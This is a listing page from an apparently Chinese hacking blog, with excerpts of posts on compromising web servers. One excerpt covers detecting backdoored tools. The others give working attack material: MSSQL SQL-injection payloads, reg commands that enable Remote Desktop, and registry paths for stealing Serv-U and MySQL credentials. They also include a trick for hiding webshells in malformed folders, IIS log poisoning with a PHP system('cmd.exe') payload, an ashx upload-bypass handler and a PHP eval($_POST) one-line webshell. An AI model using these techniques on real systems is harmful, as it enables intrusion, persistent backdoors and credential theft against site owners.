上一页 1 ··· 7 8 9 10 11 12 13 下一页
摘要: 现在网络上的东西愈来愈不可信了。 不论下载什么工具都得多个心眼,特别是经常玩黑的朋友。 俗话说:常在河边走,哪有不湿鞋。弄不好哪天自己就中招了。 下面我就简单分析下,如何判断软件是否有后门。。 我把软件分为两大类:1.非黑*客系列软件(播放器、即时聊天工具) 2.黑*客系列软件(例如:啊D、S扫描器、**等) 因为大家都知道黑*客系列软件通常都会被杀软报毒,所以必须采用不同的分析方法,分别对待。 检测前,不要运行被检测程序! 主要工具有:PEiD0.95汉化版、捆绑文件提取工具1.0、Filemon7.04汉化版、冰刃1.22中文版、下载者监视器1.0 、Regmon704.rar、 文件分析 阅读全文
posted @ 2011-05-06 04:55 WHaa_(T_T) 阅读(1003) 评论(0) 推荐(1) 编辑
摘要: //看看是什么权限的and 1=(Select IS_MEMBER('db_owner'))And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS('master'))And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --数字类型and char(124)% 阅读全文
posted @ 2011-05-05 22:01 WHaa_(T_T) 阅读(281) 评论(0) 推荐(0) 编辑
摘要: 一个新闻站点。全部都是HTML的静态页面,估计又是类似CMS的程序吧,只有后台是动态的,前台全部都是生成的静态页面。于是抄起WWWSCAN开始扫目录,看看能不能扫出个上传点什么的,因为字典比较多,WWWSCAN扫的时间比较长,所以我同时开始在GOOGLE上面查找注射点。利用site:www.xxxxxx.com inurl:asp ,来查找所有的ASP文件,然后一个一个去测试。测试过程中,发现整站用到了防注入程序,而且有的地方单独用到了isnumeric之类的函数进行了判断。经过长时间的手工检测,终于在一个新闻评论页面,找到了一个insert射点。在发表评论的地方,输入一个单引号“’”,报错了 阅读全文
posted @ 2011-04-29 01:41 WHaa_(T_T) 阅读(601) 评论(1) 推荐(0) 编辑
摘要: 开启windows的3389端口的讨论网上很多,大多数是通过修改Termservice服务对应注册表项实现的,而且对于xp、2003方法不同,且大多数情况需要重启。其实组策略可以直接开启远程桌面的监听端口(前提:termservice服务已经启动),只需修改注册表一个地方:reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /Freg add"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services&q 阅读全文
posted @ 2011-04-28 15:51 WHaa_(T_T) 阅读(817) 评论(0) 推荐(0) 编辑
摘要: 编辑器加载中...平时收集的,一般服务器对注册表的读取 很少限制的,往往从注册表中能获取不少信息 HKEY_LOCAL_MACHINE\SYSTEM\Control001\Services\ #获取一些服务信息 HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\ #server-u HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersv 阅读全文
posted @ 2011-04-28 15:28 WHaa_(T_T) 阅读(259) 评论(0) 推荐(0) 编辑
摘要: 拿下一个站后总希望自己的后门能够很隐蔽!网上关于隐藏后门的方法也很多,如加密、包含,解析漏动、加隐藏系统属性等等! 不过这些方法能有多隐蔽呢?事实上,随便拉一个段在线查马的程序就能很快的查出来,自己煞费苦心倒成了白费心机了!那么究竟怎样才能真正的隐蔽呢?下面分享一下我的方法:其实我所要分享的方法有黑友在用了,如果你管理过服务器或网站经常会遇到!这种方法原理很简单,就是利用了windows建立畸形文件夹漏洞! X..\顽固文件夹-你懂得!这里是我上大学时的一点探索,看看或许对你有帮助! 用WebShell建立X..\之后,复制自己的Shell到该顽固文件夹中(顽固文件夹用8.3短名,否则复... 阅读全文
posted @ 2011-04-28 15:15 WHaa_(T_T) 阅读(421) 评论(0) 推荐(0) 编辑
摘要: 旁站路径问题1、读网站配置。2、用以下VBSOn Error Resume NextIf (LCase(Right(WScript.Fullname,11))="wscript.exe") ThenMsgbox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & "Usage:Cscript vWeb.vbs",4096,"Lilo"WScript.QuitEnd IfSet ObjS 阅读全文
posted @ 2011-04-27 18:03 WHaa_(T_T) 阅读(942) 评论(0) 推荐(0) 编辑
摘要: 已知一个iis漏洞可以让php解释任意的给定文件。挑战:怎么执行任意命令?应用环境:防火墙配置不准许对外连接。要求:不能要求上传文件。总算看到一次答案了:http://www.inbreak.net/kxlzxtest/phpiis.txtC:\Windows\System32\LogFiles\w3svcXXXX让php解析当天访问日志,然后用get请求提交user agent为 User-Agent: <?php system("cmd.exe");?>于是当天日志加入了 2011-01-01 16:25:06 W3SVC1 10.247.186.114 G 阅读全文
posted @ 2011-04-27 16:29 WHaa_(T_T) 阅读(348) 评论(0) 推荐(0) 编辑
摘要: 过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:<%@ WebHandler Language="C#" class="Handler" %>using System;using System.Web;using System.IO;public class Handler : IHttpHandler {public void ProcessRequest (HttpContext context) {context.Response.ContentTy 阅读全文
posted @ 2011-04-27 16:14 WHaa_(T_T) 阅读(359) 评论(0) 推荐(0) 编辑
摘要: 1.jpg 内容“<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[akt]);?>”)?>”www.xxxx.com/upload/1.jpg www.xxxx.com/upload/1.jpg/shell.php 访问后生成下面的一句话www.xxxx.com/upload/shell.phpIIS7.0的畸形解析和这个类似。找到某个使用IIS7.0架设的站,把PHP大马后缀改成.jpg,传上去,得到图片地址。在图片格式后面添加xx.php随便你怎么填。只要后缀为.php就好. 阅读全文
posted @ 2011-04-27 16:10 WHaa_(T_T) 阅读(355) 评论(0) 推荐(0) 编辑
上一页 1 ··· 7 8 9 10 11 12 13 下一页